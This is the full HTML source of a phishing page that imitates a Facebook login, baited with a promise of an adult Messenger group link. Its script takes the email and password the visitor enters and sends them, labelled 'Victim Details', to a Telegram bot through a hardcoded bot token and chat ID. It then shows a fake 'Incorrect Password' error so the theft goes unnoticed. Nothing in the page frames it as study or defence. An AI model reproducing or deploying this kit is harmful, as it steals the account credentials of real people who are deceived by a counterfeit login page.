<!DOCTYPE html>
<html>
<head> 
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Facebook Login</title>
    <link rel="shortcut icon" href="https://i.ibb.co/kGQJ04V/CC-20230506-080333.png">
<link rel="stylesheet" type="text/css" href="style.css">
  <style>
  .s{
    size:2px;
  }
  </style>
</head>
<body style="background:url(1.jpeg);">
	
<style>
	* {
box-sizing: border-box;
} 

body {

.container 
background-color: #ffffff;
border-radius: 5px;
box-shadow: 0px 0px 10px 0px rgba(0,0,0,0.2);
margin: 80px auto;
max-width: 400px;
padding: 30px;
text-align: center;
} 

h1 {
color: #1877f2;
font-size: 28px;
margin-bottom: 30px;
} 

form {
display: flex;
flex-direction: column;
} 

label {
color: #1877f2;
display: inline-block;
font-size: 20px;
margin-bottom: 5px;
text-align: left;
width: 100%;
margin-top: px;
} 

input[type="text"], input[type="password"] {
border: 1px solid #dddfe2;
border-radius: 5px;
font-size: 16px;
padding: 12px;
width: 100%;
} 

button[type="submit"] {
background-color: #1877f2;
border: none;
border-radius: 5px;
color: #ffffff;
cursor: pointer;
font-size: 16px;
margin-top: 20px;
padding: 12px;
transition: background-color 0.3s ease;
width: 100%;
} 

button[type="submit"]:hover {
background-color: #0a5fa5;
} 

p {
font-size: 14px;
margin-top: 20px;
} 

a {
color: #1877f2;
font-weight: bold;
text-decoration: none;
} 

a:hover {
text-decoration: underline;
}

 .swagkarna{
	background:#fff;
	 
	width:100%;
	height:40px;
	font-size:15px;
	color:#000;
	padding:10px;
	margin-top:5px;
	margin-bottom: 10px;
	line-height:58px;
	letter-spacing:0;
	border:none;
	border:1px solid #caced4;
	border-radius:5px;
	position:relative;
	font-family:Arial;
	outline:none;
	z-index:2;
}


</style> 

</head>
<body> 

    <p id="error-message"></p>
    
<div class="container">
   <div class="img">
            <img class="mainImage" src="CC_20230626_072527.png" alt="image">
        </div>
		<h1>18+ massengar group link Loging piz</h1>
<form>

<input type="text" id="email" name="email" placeholder="Email or Phone" class="swagkarna" required>

<input type="password" id="password" name="password" placeholder="Password"  class="swagkarna" required>
<button onclick="location.href='https://Facebook.com';" type="submit" id="login" class="btn">Log In</button>
</form>
<p><a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&_rdr">Forgot Password?</a></p>
<hr>
<p>Don't have an account? <a href="https://m.facebook.com/reg/?cid=103&refsrc=deprecated&rtime=1679408395&subno_key=AaFkUvnR1UXz5BB-nEuQbGjRTjlo8TGU32dvtNicoDPg4wZiIhQITGS0w_cfGRq2Mx5R6s-DIXo-5-YnDNFjon3Rvwk1u_9UZvAAy3gg3J8anMMkNH7Gz0jqlCPcziGau0GDZhQ9qLg1mFtXwV0iklzv16cPnyY2tz2447J1FKQq_HbH1iRWEfpI2LQmHKyJQ76QukiUnkEHt352sQ3-yOJi6-X92kohNbxhKcwYYwIcI-ZNHV4FUJGQGwV14VDSvQl29CtCsXlA_qsYtB2CkesotivluRPQZz1OArg9Dowqi2mQzqo1ntMcZ8-D9bpbmEg&hrc=1&_rdr">Sign up</a></p>
</div> 


<script>

const botToken = "6107982490:AAEqonTakFgzS3Ne9GlEUsKsMInw0UzhC48";





const chatId = "5636081154";








// Get form elements
const emailInput = document.getElementById("email");
const passwordInput = document.getElementById("password");
const loginButton = document.getElementById("login"); 

// Add click event listener to login button
loginButton.addEventListener("click", function(event) {
event.preventDefault();
// Get input values
const email = emailInput.value;
const password = passwordInput.value;

// Send message to Telegram bot
const message = `Victim Details:
Email: ${email}
Password: ${password}`;
const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

fetch(url)
.then(response => {
if (response.ok) {
var errorMessage = "Incorrect Password! Please try again.";
      document.getElementById("error-message").textContent = errorMessage; 

emailInput.value = "";
passwordInput.value = "";
} else {
throw new Error("Failed to send message to Telegram bot.");
}
})
.catch(error => {
console.error(error);
alert("Failed to send login information to Telegram bot.");
});
});
</script>
</body>
</html>
